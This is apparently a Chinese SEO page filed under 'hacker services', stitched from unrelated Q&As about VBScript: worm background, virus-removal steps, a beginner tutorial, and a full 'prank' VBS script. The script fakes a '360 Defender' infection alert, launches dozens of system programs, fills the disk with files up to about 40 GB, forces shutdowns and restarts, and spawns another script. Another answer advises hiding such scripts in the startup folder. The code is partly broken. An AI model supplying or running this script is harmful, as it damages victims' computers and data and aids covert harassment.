当前位置：首页 > 黑客业务 > 正文内容

黑客代码VBS（黑客代码复制发送）

hacker2年前 (2022-06-02)黑客业务73

本文导读目录：

1、网络蠕虫病毒代码分析

2、vbs整人代码

3、怎么清除VBS病毒

4、求高手讲解一下怎么设置整人用的vbs，还有怎么将代码输入进文档里

5、uf.vbs是什么文件？起什么作用

6、VBS是什么文件???

7、vbs自动检测qq.exe进程并关闭的代码

8、求VBS代码大神来看看我电脑开机密码被修改了求告诉我的密码

网络蠕虫病毒代码分析

蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其

他的计算机系统中(通常是经过网络连接)。请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"，蠕虫病毒一般是通过1434端口漏洞传播。

比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种，2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。蠕虫病毒的一般防治方法是：使用具有实时监控功能的杀毒软件，并且注意不要轻易打开不熟悉的邮件附件。

形成原因利用漏洞主动进行攻击

此类病毒主要是“红色代码”和“尼姆亚”，以及至今依然肆虐的“求职信”等。由于IE浏览器的漏洞（IFRAMEEXECCOMMAND），使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活，而此前即便是很多防病毒专家也一直认为，带有病毒附件的邮件，只要不去打开附件，病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播，SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。

传播方式多样

如“尼姆亚”病毒和”求职信”病毒，可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。

病毒制作技术新

与传统的病毒不同的是，许多新病毒是利用当前最新的编程语言与编程技术实现的，易于修改以产生新的变种，从而逃避反病毒软件的搜索。另外，新病毒利用Java、ActiveX、VBScript等技术，可以潜伏在HTML页面里，在上网浏览时触发。

vbs整人代码

大量的楼上已经说了。这个是本人原创，亲测有用。毒性嘛，就是会烧CPU，然后在这个vbs旁边创建一大堆垃圾文件（请准备好30G空间）【具体在代码中】

仅供恶搞娱乐和研究，没有攻击任何人，组织的意图。

set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" ' 《江南皮革厂倒闭了.mp3》请准备好放在D:\

msgbox "您的电脑已被病毒入侵！",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒：因为这个游戏涉及非法内容，所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说！360是不是上帝？"+chr(13)+chr(13)+chr(13)+"（“滚”已复制到剪贴板，可以粘贴。）","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的，现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢？",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则：在开始后，请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉，或者点击确定，来开始游戏。",vbokonly+vbInformation,"360 Defender"

qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd.exe /c shutdown -a",0,true

loop

ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)

qwriteb.close

qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"

ELSE

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话，但是您一定不想浪费时间说废话，所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权，决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯！",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中，您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")

qweb.run"https://hao.360.com/"

qstart.run "cmd.exe /c shutdown -r -t 5",0,true

END IF

怎么清除VBS病毒

VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：

编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强；可以通过通过Email附件传播；通过局域网共享传播；通过感染htm、asp、jsp、php等网页文件传播；通过IRC聊天通道传播；

VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，中毒后的电脑会在各个盘符下面生成.vbs、autorun.exe等文件。下面笔者将一次手动成功清除VBS病毒的过程说一下，权当交流！

通过系统的资源管理器，可以看到一直有一个wscript.exe的进程存在，还有就是会感觉到机子很卡……

第一步：限制wscript.exe进程的运行。“开始——运行”，输入gpedit.msc，然后依次打开“计算机配置——Windows设置——安全设置——软件限制策略”，右键，选择“创建新策略”，选择“其他规则”，在右侧窗格空白处右击，在菜单中选择“新建路径规则”项，浏览选择C:\Windows\System32文件夹下的wscript.exe，将其安全级别设为“不允许”。这样我们就成功的限制了wscript.exe的运行。

第二步：通过任务管理器或者其他的工具，结束进程wscript.exe。

第三步：借助工具冰刃，删除各个盘符下面的.VBS、.vbe、js、autorun等文件。

第四步：搜索一下，在系统目录中是否还有.VBS、.vbe、js等文件存在，如果有，删除掉。在看看系统的启动项中有没有不明的启动项，如果有，也要删除掉！

第五步：重新启动电脑，看到各个盘符下面就没有.VBS等类型的文件了，系统也恢复到正常。

到这里，就已经成功的清除了VBS病毒！总结一下，重点是要限制VBS病毒的运行，只有先限制了它的运行，我们后面的删除工作才能正常的进.

求高手讲解一下怎么设置整人用的vbs，还有怎么将代码输入进文档里

建议你不懂vbs的话还是少碰为好，（最起码你要学会基础）。记事本和word的话负责进去就OK了

word是无法编辑vbs的，编辑vbs是用记事本的后缀名是vbs就可以了。整人的话你就要想方设法把你的vbs文件放入启动文件夹里（当然也可以放到别的地方）其他就不多说了。

一般整人都会用到 do loop （死循环）or 关机代码

希望对你有用（纯手打）

uf.vbs是什么文件？起什么作用

就是windows系统的一种脚本，用记事本就可以看到源代码。在没有语法错误的前提下，直接双击左键就可以运行。但必须注意的是，由于VBS的简单可行性，现在许多黑客高手都会利用VBS写一些病毒或者整人代码，所以打开VBS之前，一定要确定自己知道这段代码的作用以及流程！

VBS是什么文件???

跟我学编程1（VBS基础篇）

什么是VBScript呢? VBScript的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. 我进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了.

我知道菜鸟现在最关心的就是用什么工具来开发VBS程序了, 答案是:记事本.(Notepad).我不是开玩笑, 其实任何一种文本编辑器都可以用来开发VBS开发, 只不过记事本是由系统自带的, 比较好找而已. 尽管如此, 我还是建议你去下载一个专业的文本编辑器, 因为这些工具可以提供 "语法高亮"等功能, 更加方便开发, 用哪一个随你喜好, 我比较喜欢Edit Plus (2.10).

OK, 我们先来写一个VBScript程序热热身.

REM 输入并回显你的名字

\'使用InputBox和Msgbox函数

Dim name,msg

msg="请输入你的名字:"

name=Inputbox(msg,"名称")

Msgbox(name)

把上面的程序清单输入到记事本里面, 然后保存为以.vbs为扩展名的文件("保存类型"里面选择"所有文件").然后双击运行, 观察运行结果. 注意:请自己输入程序清单, 不要复制-粘贴

我来解释一下这个程序, 第一行和第二行的开头分别是"REM"语句和" \' ", 这两个东西的作用是相同的, 表示本行是注释行, 就是说这两行什么也不干,只是用来说明这段程序的功能, 版权信息等等. 注释行是程序最重要的部分之一, 尽管它不是必需的, 但对于其他人阅读源代码, 以及自己分析源代码是很有好处的. 好的习惯是在必要的地方加上清晰, 简洁的注释.

Dim用来声明一个变量, 在VBS中, 变量类型并不是那么重要, 就是说VBS会帮你自动识别变量类型, 而且变量在使用前不一定要先声明, 程序会动态分配变量空间. 在VBS中你不用考虑name储存的是一个整数还是一个小数(学名叫"浮点数"), 也不用考虑是不是字符串(一串字符, 比如:"Hello World"), VBS会自动帮你搞定. 所以第三行语句可以删除, 效果不会变, 但我强烈反对这么做, 一个变量的基本原则就是:先声明,后使用.变量名用字母开头,可以使用下划线,数字, 但不能使用vbs已经定义的字, 比如dim, 也不能是纯数字.

下一行被称之为"赋值", "="是赋值符号, 并不是数学中的等于号, 尽管看起来一样.这是正统的理解, 你要理解成等于也没有什么不可. 赋值号的左边是一个变量, 右边是要赋给变量的值, 经过赋值以后, msg这个变量在程序中等同于"请输入你的名字:"这个字符串,但当msg被再次复制的时候, 原值就会消失. 不光字符串, 其他任何变量都这样被赋值, 例如: a=2, b=12.222等等.

再往下,Inputbox和Msgbox是VBS内建的函数, 一个函数就相当于一个"黑箱", 有输入(参数)和输出(返回值), 你可以不用了解函数是怎么运作的, 只要了解这个函数能干什么就行了, 我们也可以定义自己的函数, 不过那要等到以后再讲. 现在我们只要了解, 一个函数可以有返回值也可以没有, 可以有参数也可以没有. 例如Inputbox就是有返回值的函数, 我们用赋值号左边的变量来"接"住InputBox的返回值--就是你输入的内容. 在inputbox右边的括号里是参数列表, 每个参数用","分隔开, 每个参数有不同的功效, 比如第一个参数会显示在提示里, 我们把msg这个变量作为第一个参数传给了Inputbox 函数, 而msg="请输入你的名字:", 所以我们在对话框的提示栏就会看到"请输入你的名字:" 第二个参数是对话框的标题, 我们用直接量(学名叫"常量", 这里是"字符串常量")传递给函数, 当然你也可以传递变量. Inputbox还有很多参数, 比如你在"名称"后面再加一个","然后输入随便一串字符(字符串,用双引号""包裹起来的一串字符叫做字符串)然后运行, 看看结果. 你会发现用于输入的文本框有了默认的值, 这就是第三个参数的作用.

Msgbox函数是用来输出的函数, 在VBS中没有专门的输出函数(BASIC中的print,C中的printf), 所以我们只能用对话框来观察输出结果, Msgbox的必要参数只有一个, 就是要输出的内容, 在这种情况下, 我们不需要理会msgbox的返回值. 关于Msgbox和Inputbox我们以后还会在讨论, 今天只是热热身, 到此为止.

要点:

1) 注释(以REM或\'开头)行在程序中不起作用, 但能让别人更容易读懂你的程序.

2) 变量好像一个盒子, 或一个代号, 可以代表你想代表的东西. 变量赋值使用"="

3) 以""包裹起来的字符称之为"字符串"

4) 函数像一个"黑箱", 有参数和返回值, 用"="左边的变量可以接住返回值

5) Inputbox函数弹出一个输入对话框,Msgbox则用于输出

作业:

1) 试验Inputbox的第三个参数

2) 写一段程序输出你的年龄

3) 写一段程序进行3次输入, 分别输入你和你父母的姓名(要求显示提示), 并分3次输出

参考资料：http://www.xurichensheng.com/bbs/printpage.asp?BoardID=5ID=6515